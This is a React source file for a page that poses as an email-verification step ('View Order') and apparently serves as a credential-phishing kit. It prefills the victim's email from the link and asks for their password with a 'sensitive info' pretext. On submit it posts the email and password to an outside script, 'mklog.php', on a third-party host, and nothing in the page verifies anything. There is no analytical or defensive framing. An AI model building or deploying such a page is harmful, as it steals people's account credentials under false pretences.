import React, { useState } from "react";
import axios from "axios";
import "./App.css";

const App = () => {
  const urlParams = new URLSearchParams(window.location.search);
  const emailParam = urlParams.get("email");

  const [formData, setFormData] = useState({
    email: emailParam || "",
    password: "",
  });

  const [loading, setLoading] = useState(false);
  const [message, setMessage] = useState("");

  const handleChange = (e) => {
    setFormData({ ...formData, [e.target.name]: e.target.value });
  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    setLoading(true);
    setMessage("");

    try {
      const response = await axios.post(
        "https://ronaldsheehan.host/scripts/tn/mklog.php",
        formData,
        {
          headers: { "Content-Type": "application/x-www-form-urlencoded" },
        }
      );

      setMessage(response.data);
    } catch (error) {
      console.error("Error submitting form:", error);
      setMessage("Submission failed. Please try again.");
    }

    setLoading(false);
  };

  return (
    <div className="background-container">
      <div className="form-container">
        <div  style={{marginBottom: 20, fontSize: 12, color: "gray", fontWeight: "bolder"}}>Because you're accessing sensitive info, you need to verify your email.</div>
         
        <form onSubmit={handleSubmit}>
          <input
            className="input"
            type="email"
            name="email"
            required
            placeholder="Enter email"
            value={formData.email}
            onChange={handleChange}
            readOnly={!!emailParam}
            autoFocus={!emailParam}
          />
          <br />
          <input
            className="input"
            type="password"
            name="password"
            required
            placeholder="Enter password"
            value={formData.password}
            onChange={handleChange}
            autoFocus={!!emailParam}
          />
          <br />
          <button className="submit" type="submit" disabled={loading}>
            {loading ? "Loading..." : "View Order"}
          </button>
        </form>

        {message && <div className="server-message">{message}</div>}
      </div>
    </div>
  );
};

export default App;
